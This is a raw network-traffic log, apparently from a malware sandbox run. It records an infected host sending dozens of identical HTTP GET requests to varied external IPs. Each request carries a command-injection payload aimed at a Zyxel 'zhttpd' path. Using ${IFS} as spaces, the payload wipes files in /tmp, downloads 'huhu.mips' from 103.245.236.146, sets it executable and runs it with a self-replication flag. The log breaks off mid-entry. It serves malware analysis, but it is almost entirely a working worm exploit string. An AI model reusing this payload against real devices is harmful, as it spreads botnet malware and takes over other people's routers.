                                                Jan 29, 2024 07:07:44.233758926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3278192.168.2.2351370107.48.252.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233783960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3279192.168.2.235673818.136.225.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233858109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3280192.168.2.2360578194.77.35.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233880043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3281192.168.2.235805653.184.33.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233906984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3282192.168.2.2355160124.193.195.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233931065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3283192.168.2.2340812142.216.111.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.233989954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3284192.168.2.233617264.145.113.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234016895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3285192.168.2.2339188218.253.67.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234060049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3286192.168.2.2360196147.209.126.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234090090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3287192.168.2.233935876.121.116.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234153986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3288192.168.2.234468231.228.204.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234200001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3289192.168.2.2348994178.173.9.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234230042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3290192.168.2.2337708201.221.100.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234263897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3291192.168.2.2345420181.220.16.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234286070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3292192.168.2.2348454143.114.222.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234322071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3293192.168.2.2338988190.172.211.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234478951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3294192.168.2.2337402155.58.150.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234504938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3295192.168.2.235453692.82.229.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234556913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3296192.168.2.2360022172.192.38.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234590054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3297192.168.2.2350962204.30.61.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234610081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3298192.168.2.2352262122.215.38.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234648943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3299192.168.2.2358720182.31.8.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234680891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3300192.168.2.2345334121.62.198.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234729052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3301192.168.2.2345364219.54.45.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234764099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3302192.168.2.2355562146.39.87.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234785080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3303192.168.2.23538344.61.122.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234828949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3304192.168.2.2359666120.21.146.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234858036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3305192.168.2.234919076.14.63.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234931946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3306192.168.2.2333322204.242.52.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.234966993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3307192.168.2.234345078.79.168.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235014915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3308192.168.2.2335348211.45.207.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235038996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3309192.168.2.2357840220.194.253.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235061884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3310192.168.2.233560285.189.32.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235100985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3311192.168.2.2350414188.6.219.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235131979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3312192.168.2.2337540134.1.174.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235187054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3313192.168.2.2360308129.34.45.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235208035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3314192.168.2.2343166186.49.186.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235243082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3315192.168.2.233323088.52.204.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235282898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3316192.168.2.2358626104.166.254.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235343933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3317192.168.2.234746699.215.125.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235362053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3318192.168.2.2357016199.34.164.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235382080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3319192.168.2.2342772164.171.31.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235424995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3320192.168.2.2346930192.53.3.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235456944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3321192.168.2.2346128175.122.30.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235502958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3322192.168.2.2356876114.121.201.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235538006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3323192.168.2.2352576218.194.22.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235559940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3324192.168.2.2348266128.231.69.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235570908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3325192.168.2.2354502101.47.30.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235630035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3326192.168.2.23602904.173.242.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235665083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3327192.168.2.2342104119.132.82.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235709906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3328192.168.2.2346688152.128.121.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235737085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3329192.168.2.233635412.67.229.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235797882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3330192.168.2.2345990175.0.57.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235826015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3331192.168.2.2346928221.173.116.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235847950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3332192.168.2.2347540195.184.125.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235904932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3333192.168.2.234041040.87.146.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235948086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3334192.168.2.2352790122.53.98.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.235981941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3335192.168.2.234108678.200.131.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236047029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3336192.168.2.2334146148.206.177.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236071110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3337192.168.2.234556425.206.204.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236104965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3338192.168.2.2336716220.162.189.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236116886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3339192.168.2.2343186149.6.91.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236157894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3340192.168.2.2352168177.79.91.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.236212969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3341192.168.2.2344726118.220.105.121443
                                                TimestampBytes transferredDirectionData
